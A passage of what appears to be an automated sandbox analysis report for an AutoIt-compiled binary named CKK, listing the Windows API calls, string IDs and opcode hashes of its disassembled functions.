                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: Combobox
                                                                                              • API String ID: 3850602802-2096851135
                                                                                              • Opcode ID: 8e8829771917ffb7d4def2e509c119122d39d40f5bfa12ff7e3571050f8fbf44
                                                                                              • Instruction ID: 417b86656380e72712925d29f2d94350f032de0585e22dc6f78da652922866fa
                                                                                              • Opcode Fuzzy Hash: 8e8829771917ffb7d4def2e509c119122d39d40f5bfa12ff7e3571050f8fbf44
                                                                                              • Instruction Fuzzy Hash: 6211B2723002087FEF21EF94DC84EFB376AEBA4764F104224F91997291E6759D518760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F600E: CreateWindowExW.USER32 ref: 009F604C
                                                                                                • Part of subcall function 009F600E: GetStockObject.GDI32(00000011), ref: 009F6060
                                                                                                • Part of subcall function 009F600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 009F606A
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A8377A
                                                                                              • GetSysColor.USER32 ref: 00A83794
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                              • String ID: static
                                                                                              • API String ID: 1983116058-2160076837
                                                                                              • Opcode ID: 2d2b7d2c57e123fc5c71c42ba1b2532f199e5b8a6d3b365997137ff9a6169289
                                                                                              • Instruction ID: c4d6539c55e77f20679aba37e0a058c6eeec1f0c98d46dfd117720095c380cdd
                                                                                              • Opcode Fuzzy Hash: 2d2b7d2c57e123fc5c71c42ba1b2532f199e5b8a6d3b365997137ff9a6169289
                                                                                              • Instruction Fuzzy Hash: 4A1129B2610209AFDF00EFA8CC45EFA7BB8FB08714F004925F955E2250EB35E8519B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A6CD7D
                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A6CDA6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$OpenOption
                                                                                              • String ID: <local>
                                                                                              • API String ID: 942729171-4266983199
                                                                                              • Opcode ID: f6aed9a7cb3dec8c606170c2943b25fdd68040ae5229e7f1ca8f5eebeb02f37d
                                                                                              • Instruction ID: 8820fb2a0fe9a82c3252427027c9b1f1831abaf2f5fa5b4a90788e604279f48b
                                                                                              • Opcode Fuzzy Hash: f6aed9a7cb3dec8c606170c2943b25fdd68040ae5229e7f1ca8f5eebeb02f37d
                                                                                              • Instruction Fuzzy Hash: B811C271205631FAD7385BA68C49EF7BEBCEF127B4F00422AB18983080D7749945D6F0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowTextLengthW.USER32 ref: 00A834AB
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A834BA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                              • String ID: edit
                                                                                              • API String ID: 2978978980-2167791130
                                                                                              • Opcode ID: b0c643dd6f13d04942dd41d3886ccbf94b5b8e2faac8753176814aa361478951
                                                                                              • Instruction ID: d25e277e04540b527ceeea1c39ee3d858779f07908e83ae562e0abdae819d5bf
                                                                                              • Opcode Fuzzy Hash: b0c643dd6f13d04942dd41d3886ccbf94b5b8e2faac8753176814aa361478951
                                                                                              • Instruction Fuzzy Hash: DB118F72100208ABEF11AFA4DC44EBB3B6AEF05B75F504724F961931D0C775DC519B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A56CB6
                                                                                              • _wcslen.LIBCMT ref: 00A56CC2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                              • String ID: STOP
                                                                                              • API String ID: 1256254125-2411985666
                                                                                              • Opcode ID: 91859cda2d4ad8caa8ce359f3b871a2d2be502ab1f98fd140af576ae3002b434
                                                                                              • Instruction ID: 7867c7473ac586056d91ab189223f684d119f05bcaefe67bf0281e6af7985d7e
                                                                                              • Opcode Fuzzy Hash: 91859cda2d4ad8caa8ce359f3b871a2d2be502ab1f98fd140af576ae3002b434
                                                                                              • Instruction Fuzzy Hash: B501C433A0092A8ACB219FBDDC80ABF77B5FBA57257900934EC6297191FB31D958C750
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                                • Part of subcall function 00A53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A53CCA
                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A51D4C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: 044c2ab6c556de1b55d05866703d5355f55271c95d0e6fce6709259e1419fe35
                                                                                              • Instruction ID: 1de7f6bf98ad9d43132e414692600c73292e4ed6062b57cd87af2f6b1026d512
                                                                                              • Opcode Fuzzy Hash: 044c2ab6c556de1b55d05866703d5355f55271c95d0e6fce6709259e1419fe35
                                                                                              • Instruction Fuzzy Hash: 7301B572601218AB8F04EFA4CD51BFE77B8FB86390B040919EC62572C1EA31590C8760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                                • Part of subcall function 00A53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A53CCA
                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00A51C46
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: 69b652e0f18f09d0c41f3d146eb621b3e9944f04a555746a80b488c16a45f0fd
                                                                                              • Instruction ID: c462ecd0edf3e3aa5b50b676d32d27320265aea214622400b06ab4dbc68a0a0c
                                                                                              • Opcode Fuzzy Hash: 69b652e0f18f09d0c41f3d146eb621b3e9944f04a555746a80b488c16a45f0fd
                                                                                              • Instruction Fuzzy Hash: E701A275A811086ACF04EBA0CA52BFF77A8AF51381F140429ED0667282EA359E1CC7B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: 3, 3, 16, 1
                                                                                              • API String ID: 176396367-3042988571
                                                                                              • Opcode ID: 7de5da3b37a609af2d606fba94b352c3ca5646b3e69f3899db7e059bc7bd17e5
                                                                                              • Instruction ID: 2ae23b898a9bb9112a9af7e4c5de845e452bc2b6e45f28448f9cc3cf0247ce0b
                                                                                              • Opcode Fuzzy Hash: 7de5da3b37a609af2d606fba94b352c3ca5646b3e69f3899db7e059bc7bd17e5
                                                                                              • Instruction Fuzzy Hash: D7E09B16615220209231137E9DC19BF56C9DFC9751714982BF989C2276EA948DD193A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message
                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                              • API String ID: 2030045667-4017498283
                                                                                              • Opcode ID: e8779b8f2da4752527ffd74d639b52ce30eacf8b9b60808d328619af64269cc7
                                                                                              • Instruction ID: 5a0ba62b04a9c3683d3c1afaa04fa5bf43756dea67d57155b950ba92f879821f
                                                                                              • Opcode Fuzzy Hash: e8779b8f2da4752527ffd74d639b52ce30eacf8b9b60808d328619af64269cc7
                                                                                              • Instruction Fuzzy Hash: 39E0483124431C3AD22477947D43FC97A859F05B65F100466FB98A55C39AF164904BF9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A0F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A10D71,?,?,?,009F100A), ref: 00A0F7CE
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,009F100A), ref: 00A10D75
                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,009F100A), ref: 00A10D84
                                                                                              Strings
                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A10D7F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                              • API String ID: 55579361-631824599
                                                                                              • Opcode ID: a010d47bef28b0e0a8b7018333cef98e54976eef5962d1787f7ef95f83905d7f
                                                                                              • Instruction ID: e5a48d89628e42e5dc279d56f98ffd0e212fe41b04f453969698b2007f749712
                                                                                              • Opcode Fuzzy Hash: a010d47bef28b0e0a8b7018333cef98e54976eef5962d1787f7ef95f83905d7f
                                                                                              • Instruction Fuzzy Hash: 5DE06D702003518FD370EFB8E904B827BE5BB04754F04492DE482C6692EBF4E4858BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID: %.3d$X64
                                                                                              • API String ID: 481472006-1077770165
                                                                                              • Opcode ID: 8765b1a1c687c654327fb5624f91bf11ae1a42fbedd3e66cbb2300069386cb5f
                                                                                              • Instruction ID: 5e47be479d4e2c6c66e5c8e78ffe3ef2b646d073b9b764ed586c0c98555748ee
                                                                                              • Opcode Fuzzy Hash: 8765b1a1c687c654327fb5624f91bf11ae1a42fbedd3e66cbb2300069386cb5f
                                                                                              • Instruction Fuzzy Hash: 54D012B5808109FACB9096D0DC498F9B3BCBB88301F608452F807A1080E6B4C5086B61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindWindowW.USER32 ref: 00A8232C
                                                                                              • PostMessageW.USER32 ref: 00A8233F
                                                                                                • Part of subcall function 00A5E97B: Sleep.KERNEL32 ref: 00A5E9F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: eac463faef3b037923b6a646c2c68bcbc43e4df40dd6e68e67357018e4ecb6d4
                                                                                              • Instruction ID: aa7ae134879ab3fca4af2b8005652c32461a8f0f88daad32d87c0fee75fa9aee
                                                                                              • Opcode Fuzzy Hash: eac463faef3b037923b6a646c2c68bcbc43e4df40dd6e68e67357018e4ecb6d4
                                                                                              • Instruction Fuzzy Hash: 2FD0C936394310B6E668F7B09C1FFC6BA19AB00B21F1049267645AA1D1D9B8A8468B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindWindowW.USER32 ref: 00A8236C
                                                                                              • PostMessageW.USER32 ref: 00A82373
                                                                                                • Part of subcall function 00A5E97B: Sleep.KERNEL32 ref: 00A5E9F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: 58d1928aaf1f0dac9257219c675e19a9e3a5ca081a012e8df25726e1c3d45bee
                                                                                              • Instruction ID: 43ecbd25c48a686b7954687fd2530924546c37feda085e1b276b2b8235c0cca1
                                                                                              • Opcode Fuzzy Hash: 58d1928aaf1f0dac9257219c675e19a9e3a5ca081a012e8df25726e1c3d45bee
                                                                                              • Instruction Fuzzy Hash: 05D0C9323C1310BAE668F7B09C0FFC6B619AB05B21F1049267645AA1D1D9B8A8468B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%